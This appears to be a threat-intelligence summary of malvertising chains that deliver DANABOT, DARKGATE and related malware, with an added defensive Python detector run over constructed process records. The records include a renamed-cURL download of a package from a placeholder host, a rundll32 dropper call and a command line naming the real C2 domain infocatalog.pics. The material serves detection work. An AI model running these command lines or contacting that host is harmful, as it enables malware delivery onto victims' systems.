Threat actors are purchasing advertisements for malicious websites to lure victims into downloading malware, which can eventually lead to data theft and ransomware. This technique has been used across several ad platforms, including search engine ads and social media ads. Four different malware families were observed during the investigation of these malicious ad campaigns: PAPERDROP, PAPERTEAR, DANABOT, and DARKGATE. Three different delivery chains were observed, two of which use a renamed copy of the cURL binary.
In the first infection chain, the wscript.exe process initiates a DNS request and then launches the Windows Installer utility msiexec.exe, which installs an application. The chain then uses rundll32.exe to load the dropper DLL and calls its “start” function to launch the DANABOT payload.
In the second infection chain, the PAPERTEAR downloader initiates an HTTP POST request to infocatalog[.]pics over port 8080. wscript.exe then executes a one-liner command that eventually drops the DARKGATE malware onto the victim’s system.
The third execution chain resembles the second, but here the PAPERDROP downloader runs a longer one-liner that uses a renamed curl.exe binary to download and install a malicious package file, which in turn drops the DANABOT malware.
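The three chains above share a handful of host-level behaviours a defender can look for in process-creation telemetry: wscript.exe spawning msiexec.exe, rundll32.exe invoking a DLL export named “start”, a cURL binary running under a different file name, and command lines that reference the infocatalog[.]pics host. The script below is an added example written for this page, not code from the report; it runs those four checks over a handful of constructed process records whose field names are modelled on Sysmon Event ID 1 (ParentImage, Image, OriginalFileName, CommandLine) but are not real captured events. File paths, the `dropper.dll` name and the download host placeholder are assumptions.

```python
"""Detection heuristics for the malvertising delivery chains described above.

Added example, not part of the report. The records below are constructed and
simplified; field names mirror Sysmon Event ID 1 (OriginalFileName comes from
the PE version resource, which is why it still says curl.exe for a renamed copy).
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str        # full path of the parent process
    image: str               # full path of the created process
    original_file_name: str  # PE OriginalFileName, "" if unavailable
    command_line: str


# Constructed sample records (paths and dropper.dll name are assumptions).
SAMPLE_EVENTS = [
    # 0: benign baseline
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              "NOTEPAD.EXE", "notepad.exe"),
    # 1: chain 1, wscript.exe launching the Windows Installer
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe", r"msiexec.exe /i C:\Users\Public\app.msi /qn"),
    # 2: chain 1, rundll32 calling the dropper's "start" export
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\rundll32.exe",
              "RUNDLL32.EXE", r'rundll32.exe "C:\Users\Public\dropper.dll",start'),
    # 3: chains 2/3, renamed cURL fetching a package (download host is a placeholder)
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Users\Public\updater.exe",
              "curl.exe", r"updater.exe -s -o C:\Users\Public\pkg.msi "
                          r"http://DOWNLOAD-HOST-PLACEHOLDER/pkg.msi"),
    # 4: chain 2 indicator from the report in a command line
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Users\Public\downloader.exe",
              "", "downloader.exe http://infocatalog.pics:8080/"),
]

# A DLL argument followed by ",start": the export name named in the report.
RUNDLL32_START = re.compile(r'\.dll"?\s*,\s*start\b', re.IGNORECASE)
# The domain published in the report, written without the defanging brackets.
KNOWN_C2_HOST = re.compile(r"\binfocatalog\.pics\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name component of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(event: ProcEvent) -> list:
    """Return the list of rule names that fire for one process-creation record."""
    findings = []
    parent = basename(event.parent_image)
    image = basename(event.image)

    # Chain 1: script host handing off to the Windows Installer.
    if parent == "wscript.exe" and image == "msiexec.exe":
        findings.append("wscript_spawns_msiexec")

    # Chain 1: rundll32 loading a DLL and calling its "start" export.
    if image == "rundll32.exe" and RUNDLL32_START.search(event.command_line):
        findings.append("rundll32_start_export")

    # Chains 2/3: the binary is cURL by its version resource but runs under another name.
    if event.original_file_name.lower() == "curl.exe" and image != "curl.exe":
        findings.append("renamed_curl")

    # Chain 2: the report's domain appearing anywhere in a command line.
    if KNOWN_C2_HOST.search(event.command_line):
        findings.append("known_c2_domain_in_cmdline")

    return findings


def scan(events) -> dict:
    """Map each event index to its findings, keeping only events that matched."""
    return {i: f for i, e in enumerate(events) if (f := detect(e))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(hits)}")
```

The renamed-cURL rule depends on OriginalFileName being populated, so it is only as good as the telemetry source; the domain rule should be fed from a maintained indicator list rather than a hard-coded pattern, and the rundll32 rule will also fire on legitimate DLLs that happen to export a function called `start`, so treat it as a lead to triage alongside the parent process and DLL path rather than a verdict on its own.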
Overall, threat actors are using search engine ads to deliver malware and have been observed using several malware families and delivery chains. The specific methods used in these infection chains are described in detail in the published report, along with indicators of compromise such as domain names and IP addresses.